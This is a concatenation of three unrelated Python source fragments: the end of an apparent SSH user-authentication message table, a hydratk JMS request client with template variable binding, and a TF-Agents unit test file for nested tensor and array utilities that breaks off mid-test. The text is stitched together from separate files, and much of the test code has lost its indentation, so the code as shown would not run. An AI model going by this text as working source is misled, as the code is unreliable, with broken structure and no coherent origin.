MSG_USERAUTH_REQUEST = 50
MSG_USERAUTH_FAILURE = 51
MSG_USERAUTH_SUCCESS = 52
MSG_USERAUTH_BANNER = 53
MSG_USERAUTH_INFO_RESPONSE = 61
MSG_USERAUTH_PK_OK = 60
# Build a number -> name map of every MSG_* constant defined above and
# attach it to both services for packet-type logging.
messages = {}
for k, v in list(locals().items()):
    if k[:4] == 'MSG_':
        messages[v] = k
SSHUserAuthServer.protocolMessages = messages
SSHUserAuthClient.protocolMessages = messages
del messages
del v
# NOTE(review): the loop variable ``k`` is left bound at module scope.
# Doubles, not included in the protocols' mappings
MSG_USERAUTH_PASSWD_CHANGEREQ = 60
MSG_USERAUTH_INFO_REQUEST = 60
|
|
# -*- coding: utf-8 -*-
"""Simple JMS client for request based processing
.. module:: network.jms.simplejms
:platform: Unix
:synopsis: Simple JMS client for request based processing
.. moduleauthor:: Petr Czaderna <pc@hydratk.org>
"""
from hydratk.lib.network.jms import jms_client
from hydratk.lib.system import fs
class JMSClient(jms_client.JMSClient, object):
    """JMS client specialized for request based processing.

    Wraps the generic JMS client with a stored request object whose
    destination queue, JMSType and message content are used when sending.
    """

    _request = None   # JMSRequest to send
    _response = None  # response placeholder, read-only from outside

    @property
    def request(self):
        """ request property getter, setter """
        return self._request

    @request.setter
    def request(self, req):
        """ request property setter """
        self._request = req

    @property
    def response(self):
        """ response property getter """
        return self._response

    def send(self, jms_correlation_id):
        """Send the configured request message.

        Args:
            jms_correlation_id (str): JMSCorrelationID header value

        Returns:
            bool: result of the underlying client send
        """
        headers = {
            'JMSType': self._request.jms_type,
            'JMSCorrelationID': jms_correlation_id,
        }
        return jms_client.JMSClient.send(
            self,
            self._request.destination_queue,
            self._request.message.content,
            headers=headers
        )
class JMSRequest(object):
    """Outgoing JMS request: destination queue, JMSType and message."""

    _msg = None
    _destination_queue = None
    _jms_type = None

    def __init__(self, destination_queue, jms_type):
        """Store the target queue and JMSType for this request.

        Args:
            destination_queue (str): queue
            jms_type (str): JMSType
        """
        self._destination_queue = destination_queue
        self._jms_type = jms_type

    @property
    def destination_queue(self):
        """Target queue name (read/write)."""
        return self._destination_queue

    @destination_queue.setter
    def destination_queue(self, queue):
        self._destination_queue = queue

    @property
    def jms_type(self):
        """JMSType header value (read/write)."""
        return self._jms_type

    @jms_type.setter
    def jms_type(self, type):
        self._jms_type = type

    @property
    def msg(self):
        """Request message object (read/write)."""
        return self._msg

    @msg.setter
    def msg(self, msg):
        self._msg = msg

    # ``message`` is an exact alias of ``msg`` (same property object, so
    # getter and setter behave identically).
    message = msg
class JMSRequestMessage(object):
    """JMS message content with simple ``[var]`` template binding."""

    _bind_lchr = '['   # left delimiter of a template variable
    _bind_rchr = ']'   # right delimiter of a template variable
    _content = None

    def __init__(self, content=None, source='file'):
        """Initialize the message content.

        Args:
            content (str): filename including path if source=file,
                message content if source=str
            source (str): content source, file|str
        """
        if content is not None:
            if source == 'file':
                self.load_from_file(content)
            if source == 'str':
                self._content = content

    @property
    def content(self):
        """Message content (read/write)."""
        return self._content

    @content.setter
    def content(self, content):
        self._content = content

    def load_from_file(self, msg_file):
        """Load message content from a file.

        Args:
            msg_file (str): filename including path
        """
        self._content = fs.file_get_contents(msg_file)

    def bind_var(self, *args, **kwargs):
        """Bind input data to the message template.

        Positional dict arguments are applied first (in order), followed by
        keyword bindings.  Every occurrence of ``[name]`` in the content is
        replaced by the bound value; no-op when content is unset.

        Args:
            args (arg): dicts of variable bindings
            kwargs (kwargs): key/value bindings
        """
        if self._content is None:
            return
        rendered = str(self._content)
        bindings = [pair for mapping in args for pair in mapping.items()]
        bindings.extend(kwargs.items())
        for var, value in bindings:
            placeholder = '%s%s%s' % (self._bind_lchr, var, self._bind_rchr)
            rendered = rendered.replace(placeholder, str(value))
        self._content = rendered
class JMSResponse(object):
    """Placeholder for a JMS response; currently carries no data."""
    pass
|
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tf_agents.utils.nest_utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
from tf_agents.specs import array_spec
from tf_agents.specs import tensor_spec
from tf_agents.utils import nest_utils
# We use this to build {Dict,Tuple,List}Wrappers for testing nesting code.
from tensorflow.python.training.tracking import data_structures # pylint: disable=g-direct-tensorflow-import # TF internal
# pylint: disable=invalid-name
# Both aliases point at the same TF tracking helper; wrap_or_unwrap returns
# the wrapper type appropriate to its argument (dict, tuple, list).
DictWrapper = data_structures.wrap_or_unwrap
TupleWrapper = data_structures.wrap_or_unwrap
# pylint: enable=invalid-name
class NestedTensorsTest(tf.test.TestCase):
"""Tests functions related to nested tensors."""
  def nest_spec(self, shape=(2, 3), dtype=tf.float32, include_sparse=True):
    """Return a nested spec structure mixing dict/tuple/list containers.

    Args:
      shape: shape applied to every spec in the nest.
      dtype: dtype applied to every spec in the nest.
      include_sparse: whether to keep the `tf.SparseTensorSpec` entry.

    Returns:
      A dict nest of `TensorSpec`/`BoundedTensorSpec` leaves held in nested
      dict, tuple and list containers, optionally including a sparse spec.
    """
    spec = {
        'tensor_spec_1':
            tensor_spec.TensorSpec(shape, dtype),
        'bounded_spec_1':
            tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10),
        'dict_spec': {
            'tensor_spec_2':
                tensor_spec.TensorSpec(shape, dtype),
            'bounded_spec_2':
                tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10)
        },
        'tuple_spec': (
            tensor_spec.TensorSpec(shape, dtype),
            tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10),
        ),
        'list_spec': [
            tensor_spec.TensorSpec(shape, dtype),
            (tensor_spec.TensorSpec(shape, dtype),
             tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10)),
        ],
        'sparse_tensor_spec': tf.SparseTensorSpec(
            shape=shape, dtype=dtype)
    }
    if not include_sparse:
      del spec['sparse_tensor_spec']
    return spec
  def zeros_from_spec(self, spec, batch_size=None, extra_sizes=None):
    """Return tensors matching spec with desired additional dimensions.

    Args:
      spec: A `tf.TypeSpec`, e.g. `tf.TensorSpec` or `tf.SparseTensorSpec`.
      batch_size: The desired batch size; the size of the first dimension of
        all tensors.
      extra_sizes: An optional list of additional dimension sizes beyond the
        batch_size.

    Returns:
      A possibly nested tuple of Tensors matching the spec.

    Raises:
      TypeError: if a flattened spec entry is neither a `tf.TensorSpec` nor
        a `tf.SparseTensorSpec`.
    """
    tensors = []
    extra_sizes = extra_sizes or []
    for s in tf.nest.flatten(spec):
      if isinstance(s, tf.SparseTensorSpec):
        if batch_size:
          shape = [batch_size] + extra_sizes + s.shape
          rank = 1 + len(extra_sizes) + 2
        else:
          shape = s.shape
          # NOTE(review): rank 2 hardcodes a rank-2 sparse spec, which
          # matches nest_spec's default shapes -- confirm before reuse with
          # other ranks.
          rank = 2
        # Seven zero-valued entries at the origin of the dense shape.
        tensors.append(
            tf.SparseTensor(
                indices=tf.zeros([7, rank], dtype=tf.int64),
                values=tf.zeros([7], dtype=s.dtype),
                dense_shape=tf.constant(shape.as_list(), dtype=tf.int64)))
      elif isinstance(s, tf.TensorSpec):
        if batch_size:
          shape = tf.TensorShape([batch_size] + extra_sizes).concatenate(
              s.shape)
        else:
          shape = s.shape
        tensors.append(tf.zeros(shape, dtype=s.dtype))
      else:
        raise TypeError('Unexpected spec type: {}'.format(s))
    return tf.nest.pack_sequence_as(spec, tensors)
  def placeholders_from_spec(self, spec):
    """Return tensors matching spec with an added unknown batch dimension.

    Args:
      spec: A `tf.TypeSpec`, e.g. `tf.TensorSpec` or `tf.SparseTensorSpec`.

    Returns:
      A possibly nested tuple of Tensors matching the spec.

    Raises:
      TypeError: if a flattened spec entry is neither a `tf.TensorSpec` nor
        a `tf.SparseTensorSpec`.
    """
    # NOTE(review): tf.compat.v1.placeholder requires graph (non-eager)
    # execution -- presumably callers run inside a v1 graph context.
    tensors = []
    for s in tf.nest.flatten(spec):
      if isinstance(s, tf.SparseTensorSpec):
        # A dense placeholder converted to sparse stands in for a sparse
        # placeholder with an unknown leading dimension.
        shape = tf.TensorShape([None]).concatenate(s.shape)
        tensors.append(
            tf.sparse.from_dense(
                tf.compat.v1.placeholder(dtype=s.dtype, shape=shape)))
      elif isinstance(s, tf.TensorSpec):
        shape = tf.TensorShape([None]).concatenate(s.shape)
        tensors.append(tf.compat.v1.placeholder(dtype=s.dtype, shape=shape))
      else:
        raise TypeError('Unexpected spec type: {}'.format(s))
    return tf.nest.pack_sequence_as(spec, tensors)
def testGetOuterShapeNotBatched(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_size = nest_utils.get_outer_shape(tensor, spec)
self.assertAllEqual(self.evaluate(batch_size), [])
def testGetOuterShapeOneDim(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_size = nest_utils.get_outer_shape(tensor, spec)
self.assertEqual(self.evaluate(batch_size), [5])
def testGetOuterShapeTwoDims(self):
tensor = tf.zeros([7, 5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_dim = nest_utils.get_outer_shape(tensor, spec)
self.assertAllEqual(self.evaluate(batch_dim), [7, 5])
def testGetOuterShapeDynamicShapeBatched(self):
spec = tensor_spec.TensorSpec([1], dtype=tf.float32)
tensor = tf.convert_to_tensor(value=[[0.0]] * 8)
batch_size = self.evaluate(nest_utils.get_outer_shape(tensor, spec))
self.assertAllEqual(batch_size, [8])
def testGetOuterShapeDynamicShapeNotBatched(self):
spec = tensor_spec.TensorSpec([None, 1], dtype=tf.float32)
tensor = tf.convert_to_tensor(value=[[0.0]] * 8)
batch_size = self.evaluate(nest_utils.get_outer_shape(tensor, spec))
self.assertAllEqual(batch_size, [])
def testGetOuterDimsSingleTensorUnbatched(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_dims = nest_utils.get_outer_rank(tensor, spec)
self.assertFalse(batch_dims)
def testGetOuterDimsSingleTensorBatched(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_dims = nest_utils.get_outer_rank(tensor, spec)
self.assertEqual(batch_dims, 1)
def testGetOuterDimsSpecMismatchUnbatched(self):
tensor = tf.zeros([1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.get_outer_rank(tensor, spec)
def testGetOuterDimsSpecMismatchBatched(self):
tensor = tf.zeros([5, 1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.get_outer_rank(tensor, spec)
def testGetOuterDimsNestedTensorsUnbatched(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
batch_dims = nest_utils.get_outer_rank(tensors, specs)
self.assertFalse(batch_dims)
def testGetOuterDimsNestedTensorsBatched(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
batch_dims = nest_utils.get_outer_rank(tensors, specs)
self.assertEqual(batch_dims, 1)
def testGetOuterDimsNestedTensorsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
tensors['tensor_spec_1'] = tf.zeros(shape)
with self.assertRaises(ValueError):
nest_utils.get_outer_rank(tensors, specs)
def testGetOuterDimsNestedTensorsMultipleBatchDims(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
batch_dims = nest_utils.get_outer_rank(tensors, specs)
self.assertEqual(batch_dims, 2)
def testGetOuterDimsNestedTensorsMultipleBatchDimsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
# Tensors are ok.
self.assertEqual(nest_utils.get_outer_rank(tensors, specs), 2)
with self.assertRaises(ValueError):
tensors['tensor_spec_1'] = tf.zeros_like(tensors['tensor_spec_1'][0])
# Tensors are not ok.
nest_utils.get_outer_rank(tensors, specs)
def testIsBatchedSingleTensorFalse(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
is_batched = nest_utils.is_batched_nested_tensors(tensor, spec)
self.assertFalse(is_batched)
def testIsBatchedSingleTensorTrue(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
is_batched = nest_utils.is_batched_nested_tensors(tensor, spec)
self.assertTrue(is_batched)
def testIsBatchedSingleTensorValueErrorUnBatched(self):
tensor = tf.zeros([1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.is_batched_nested_tensors(tensor, spec)
def testIsBatchedSingleTensorValueErrorBatched(self):
tensor = tf.zeros([5, 1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.is_batched_nested_tensors(tensor, spec)
def testIsBatchedNestedTensorsFalse(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
is_batched = nest_utils.is_batched_nested_tensors(tensors, specs)
self.assertFalse(is_batched)
def testIsBatchedNestedTensorsTrue(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
is_batched = nest_utils.is_batched_nested_tensors(tensors, specs)
self.assertTrue(is_batched)
def testIsBatchedNestedTensorsAllowExtraFields(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
tensors['extra_field'] = tf.constant([1, 2, 3])
is_batched = nest_utils.is_batched_nested_tensors(
tensors, specs, allow_extra_fields=True)
self.assertTrue(is_batched)
def testIsBatchedNestedTensorsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
tensors['tensor_spec_1'] = tf.zeros(shape)
with self.assertRaises(ValueError):
nest_utils.is_batched_nested_tensors(tensors, specs)
  def testIsBatchedNestedTensorsMultipleBatchDimsFalse(self):
    """Spec-shaped tensors are unbatched even when two outer dims expected."""
    shape = [2, 3]
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs)
    is_batched = nest_utils.is_batched_nested_tensors(
        tensors, specs, num_outer_dims=2)
    self.assertFalse(is_batched)
  def testIsBatchedNestedTensorsMultipleBatchDimsTrue(self):
    """Two extra leading dims satisfy num_outer_dims=2."""
    shape = [2, 3]
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
    is_batched = nest_utils.is_batched_nested_tensors(
        tensors, specs, num_outer_dims=2)
    self.assertTrue(is_batched)
  def testIsBatchedNestedTensorsMultipleBatchDimsWrongBatchDimNumber(self):
    """A single outer dim does not count as batched when two are expected."""
    shape = [2, 3]
    specs = self.nest_spec(shape)
    # Tensors only have one batch dim.
    tensors = self.zeros_from_spec(specs, batch_size=2)
    is_batched = nest_utils.is_batched_nested_tensors(tensors,
                                                      specs,
                                                      num_outer_dims=2)
    self.assertFalse(is_batched)
  def testIsBatchedNestedTensorsMultipleBatchDimsRightBatchDimNumber(self):
    """An extra outer dim of size 1 still satisfies num_outer_dims=2."""
    shape = [2, 3]
    specs = self.nest_spec(shape)
    # Tensors only have one batch dim.
    tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[1])
    is_batched = nest_utils.is_batched_nested_tensors(tensors,
                                                      specs,
                                                      num_outer_dims=2)
    self.assertTrue(is_batched)
def testIsBatchedNestedTensorsMultipleBatchDimsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
# Tensors are ok.
nest_utils.is_batched_nested_tensors(tensors, specs, num_outer_dims=2)
with self.assertRaises(ValueError):
tensors['tensor_spec_1'] = tf.zeros_like(tensors['tensor_spec_1'][0])
# Tensors are not ok.
nest_utils.is_batched_nested_tensors(tensors, specs, num_outer_dims=2)
def testBatchSingleTensor(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batched_tensor = nest_utils.batch_nested_tensors(tensor, spec)
self.assertEqual(batched_tensor.shape.as_list(), [1, 2, 3])
def testBatchedSingleTensor(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batched_tensor = nest_utils.batch_nested_tensors(tensor, spec)
self.assertEqual(batched_tensor.shape.as_list(), [5, 2, 3])
def testWrongShapeRaisesValueError(self):
tensor = tf.zeros([3, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.batch_nested_tensors(tensor, spec)
  def testBatchNestedTensorsNoSpec(self):
    """batch_nested_tensors without a spec adds a leading dim of size 1."""
    shape = [2, 3]
    batch_shape = [1] + shape
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs)
    tf.nest.assert_same_structure(tensors, specs)
    batched_tensors = nest_utils.batch_nested_tensors(tensors)
    tf.nest.assert_same_structure(specs, batched_tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), batch_shape)
    tf.nest.map_structure(assert_shapes, batched_tensors)
  def testBatchNestedTensors(self):
    """batch_nested_tensors with a spec adds a leading dim of size 1."""
    shape = [2, 3]
    batch_shape = [1] + shape
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs)
    tf.nest.assert_same_structure(tensors, specs)
    batched_tensors = nest_utils.batch_nested_tensors(tensors, specs)
    tf.nest.assert_same_structure(specs, batched_tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), batch_shape)
    tf.nest.map_structure(assert_shapes, batched_tensors)
  def testBatchedNestedTensors(self):
    """An already-batched nest passes through batch_nested_tensors unchanged."""
    shape = [2, 3]
    batch_size = 5
    batch_shape = [batch_size] + shape
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs, batch_size=batch_size)
    tf.nest.assert_same_structure(tensors, specs)
    batched_tensors = nest_utils.batch_nested_tensors(tensors, specs)
    tf.nest.assert_same_structure(specs, batched_tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), batch_shape)
    tf.nest.map_structure(assert_shapes, batched_tensors)
def testUnBatchSingleTensor(self):
batched_tensor = tf.zeros([1, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
tensor = nest_utils.unbatch_nested_tensors(batched_tensor, spec)
self.assertEqual(tensor.shape.as_list(), [2, 3])
def testUnBatchedSingleTensor(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
unbatched_tensor = nest_utils.unbatch_nested_tensors(tensor, spec)
self.assertEqual(unbatched_tensor.shape.as_list(), [2, 3])
  def testUnBatchNestedTensorsNoSpec(self):
    """unbatch_nested_tensors without a spec strips the size-1 leading dim."""
    shape = [2, 3]
    batch_size = 1
    specs = self.nest_spec(shape, include_sparse=False)
    batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
    tf.nest.assert_same_structure(batched_tensors, specs)
    tensors = nest_utils.unbatch_nested_tensors(batched_tensors)
    tf.nest.assert_same_structure(specs, tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape, t)
    tf.nest.map_structure(assert_shapes, tensors)
  def testUnBatchNestedTensors(self):
    """unbatch_nested_tensors with a spec strips the size-1 leading dim."""
    shape = [2, 3]
    batch_size = 1
    specs = self.nest_spec(shape, include_sparse=False)
    batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
    tf.nest.assert_same_structure(batched_tensors, specs)
    tensors = nest_utils.unbatch_nested_tensors(batched_tensors, specs)
    tf.nest.assert_same_structure(specs, tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape, t)
    tf.nest.map_structure(assert_shapes, tensors)
  def testSplitNestedTensors(self):
    """split_nested_tensors yields batch_size nests of leading-dim-1 slices."""
    shape = [2, 3]
    batch_size = 7
    specs = self.nest_spec(shape, include_sparse=True)
    batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
    tf.nest.assert_same_structure(batched_tensors, specs)
    tensors = nest_utils.split_nested_tensors(batched_tensors, specs,
                                              batch_size)
    self.assertEqual(batch_size, len(tensors))
    for t in tensors:
      tf.nest.assert_same_structure(specs, t)
    def assert_shapes(t):
      if not tf.executing_eagerly() and isinstance(t, tf.SparseTensor):
        # Constant value propagation in SparseTensors does not allow us to infer
        # the value of output t.shape from input's t.shape; only its rank.
        self.assertEqual(len(t.shape), 1 + len(shape))
      else:
        self.assertEqual(t.shape.as_list(), [1] + shape)
    tf.nest.map_structure(assert_shapes, tensors)
  def testSplitNestedTensorsSizeSplits(self):
    """split_nested_tensors honors explicit size_splits along the batch dim."""
    shape = [2, 3]
    batch_size = 9
    size_splits = [2, 4, 3]
    specs = self.nest_spec(shape, include_sparse=False)
    batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
    tf.nest.assert_same_structure(batched_tensors, specs)
    tensors = nest_utils.split_nested_tensors(
        batched_tensors, specs, size_splits)
    self.assertEqual(len(tensors), len(size_splits))
    for i, tensor in enumerate(tensors):
      tf.nest.assert_same_structure(specs, tensor)
      tf.nest.map_structure(
          lambda t: self.assertEqual(t.shape.as_list()[0], size_splits[i]),  # pylint: disable=cell-var-from-loop
          tensor)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list()[1:], shape)
    tf.nest.map_structure(assert_shapes, tensors)
  def testUnstackNestedTensors(self):
    """Unstacking removes the batch dim, yielding batch_size spec-shaped nests."""
    shape = [5, 8]
    batch_size = 7
    specs = self.nest_spec(shape, include_sparse=False)
    batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
    tf.nest.assert_same_structure(batched_tensors, specs)
    tensors = nest_utils.unstack_nested_tensors(batched_tensors, specs)
    self.assertEqual(batch_size, len(tensors))
    for t in tensors:
      tf.nest.assert_same_structure(specs, t)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape)
    tf.nest.map_structure(assert_shapes, tensors)
  def testStackNestedTensors(self):
    """stack_nested_tensors stacks nests along a new leading (batch) axis."""
    shape = [5, 8]
    batch_size = 3
    batched_shape = [batch_size,] + shape
    specs = self.nest_spec(shape, include_sparse=False)
    unstacked_tensors = [self.zeros_from_spec(specs) for _ in range(batch_size)]
    stacked_tensor = nest_utils.stack_nested_tensors(unstacked_tensors)
    tf.nest.assert_same_structure(specs, stacked_tensor)
    assert_shapes = lambda tensor: self.assertEqual(tensor.shape, batched_shape)
    tf.nest.map_structure(assert_shapes, stacked_tensor)
  def testStackNestedTensorsAxis1(self):
    """stack_nested_tensors(axis=1) inserts the new dim after the first."""
    shape = [5, 8]
    stack_dim = 3
    stacked_shape = [5, 3, 8]
    specs = self.nest_spec(shape, include_sparse=False)
    unstacked_tensors = [self.zeros_from_spec(specs)] * stack_dim
    stacked_tensor = nest_utils.stack_nested_tensors(unstacked_tensors, axis=1)
    tf.nest.assert_same_structure(specs, stacked_tensor)
    assert_shapes = lambda tensor: self.assertEqual(tensor.shape, stacked_shape)
    tf.nest.map_structure(assert_shapes, stacked_tensor)
def testUnBatchedNestedTensors(self, include_sparse=False):
shape = [2, 3]
specs = self.nest_spec(shape, include_sparse=False)
unbatched_tensors = self.zeros_from_spec(specs)
tf.nest.assert_same_structure(unbatched_tensors, specs)
tensors = nest_utils.unbatch_nested_tensors(unbatched_tensors, specs)
tf.nest.assert_same_structure(specs, tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape, t)
tf.nest.map_structure(assert_shapes, tensors)
  def testFlattenMultiBatchedSingleTensor(self):
    """Two outer dims [7, 5] are flattened into a single dim of 35."""
    spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
    tensor = self.zeros_from_spec(spec, batch_size=7, extra_sizes=[5])
    (batch_flattened_tensor,
     batch_dims) = nest_utils.flatten_multi_batched_nested_tensors(tensor, spec)
    self.assertEqual(batch_flattened_tensor.shape.as_list(), [35, 2, 3])
    # Initialize variables before evaluating batch_dims (graph mode).
    self.evaluate(tf.compat.v1.global_variables_initializer())
    batch_dims_ = self.evaluate(batch_dims)
    self.assertAllEqual(batch_dims_, [7, 5])
  def testFlattenMultiBatchedNestedTensors(self):
    """Flattening applies to every entry of the nest, preserving structure."""
    shape = [2, 3]
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs, batch_size=7, extra_sizes=[5])
    (batch_flattened_tensors,
     batch_dims) = nest_utils.flatten_multi_batched_nested_tensors(
         tensors, specs)
    tf.nest.assert_same_structure(specs, batch_flattened_tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), [35, 2, 3])
    tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
    # Initialize variables before evaluating batch_dims (graph mode).
    self.evaluate(tf.compat.v1.global_variables_initializer())
    batch_dims_ = self.evaluate(batch_dims)
    self.assertAllEqual(batch_dims_, [7, 5])
  def testFlattenMultiBatchedNestedTensorsWithPartiallyKnownShape(self):
    """Unknown batch dims flatten to a single unknown (None) leading dim."""
    if tf.executing_eagerly():
      self.skipTest('Do not check nest processing of data in eager mode. '
                    'Placeholders are not compatible with eager execution.')
    shape = [2, 3]
    specs = self.nest_spec(shape, include_sparse=False)
    tensors = self.placeholders_from_spec(specs)
    (batch_flattened_tensors,
     _) = nest_utils.flatten_multi_batched_nested_tensors(
         tensors, specs)
    tf.nest.assert_same_structure(specs, batch_flattened_tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), [None, 2, 3])
    tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
  def testFlattenMultiBatchedNestedTensorsWithSparseTensor(self):
    """Sparse entries in the nest flatten the same way as dense ones."""
    if tf.executing_eagerly():
      self.skipTest('Do not check nest processing of data in eager mode. '
                    'Placeholders are not compatible with eager execution.')
    shape = [2, 3]
    specs = self.nest_spec(shape)
    tensors = self.zeros_from_spec(specs, batch_size=7, extra_sizes=[5])
    (batch_flattened_tensors,
     _) = nest_utils.flatten_multi_batched_nested_tensors(tensors, specs)
    tf.nest.assert_same_structure(specs, batch_flattened_tensors)
    assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), [35, 2, 3])
    tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
  def testFlattenMultiBatchedNestedTensorsWithPartiallyKnownSparseTensor(self):
    """Sparse entries with unknown dims keep only their rank after flattening."""
    if tf.executing_eagerly():
      self.skipTest('Do not check nest processing of data in eager mode. '
                    'Placeholders are not compatible with eager execution.')
    shape = [2, None]
    specs = self.nest_spec(shape)
    tensors = self.placeholders_from_spec(specs)
    (batch_flattened_tensors,
     _) = nest_utils.flatten_multi_batched_nested_tensors(tensors, specs)
    tf.nest.assert_same_structure(specs, batch_flattened_tensors)
    def assert_shapes(t):
      # Sparse shapes cannot be fully inferred here; check only the rank.
      if isinstance(t, tf.SparseTensor):
        self.assertEqual(t.shape.rank, 3)
      else:
        self.assertEqual(t.shape.as_list(), [None, 2, None])
    tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
class NestedArraysTest(tf.test.TestCase):
  """Tests functions related to nested arrays."""

  def nest_spec(self, shape=(2, 3), dtype=np.float32):
    """Build a representative nest (dict/tuple/list) of numpy array specs."""
    return {
        'array_spec_1':
            array_spec.ArraySpec(shape, dtype),
        'bounded_spec_1':
            array_spec.BoundedArraySpec(shape, dtype, -10, 10),
        'dict_spec': {
            'tensor_spec_2':
                array_spec.ArraySpec(shape, dtype),
            'bounded_spec_2':
                array_spec.BoundedArraySpec(shape, dtype, -10, 10)
        },
        'tuple_spec': (
            array_spec.ArraySpec(shape, dtype),
            array_spec.BoundedArraySpec(shape, dtype, -10, 10),
        ),
        'list_spec': [
            array_spec.ArraySpec(shape, dtype),
            (array_spec.ArraySpec(shape, dtype),
             array_spec.BoundedArraySpec(shape, dtype, -10, 10)),
        ],
    }

  def zeros_from_spec(self, specs, outer_dims=None):
    """Return arrays matching spec with desired additional dimensions.

    Args:
      specs: A nested array spec.
      outer_dims: An optional list of outer dimensions, e.g. batch size.

    Returns:
      A nested tuple of arrays matching the spec.
    """
    outer_dims = outer_dims or []
    def _zeros(spec):
      # type(spec.shape)(outer_dims) keeps the shape container type
      # (tuple vs list) consistent with the spec's own shape.
      return np.zeros(type(spec.shape)(outer_dims) + spec.shape, spec.dtype)
    return tf.nest.map_structure(_zeros, specs)

  def testUnstackNestedArrays(self):
    """Unstacking a batched nest yields batch_size unbatched nests."""
    shape = (5, 8)
    batch_size = 3
    specs = self.nest_spec(shape)
    batched_arrays = self.zeros_from_spec(specs, outer_dims=[batch_size])
    unbatched_arrays = nest_utils.unstack_nested_arrays(batched_arrays)
    self.assertEqual(batch_size, len(unbatched_arrays))
    for array in unbatched_arrays:
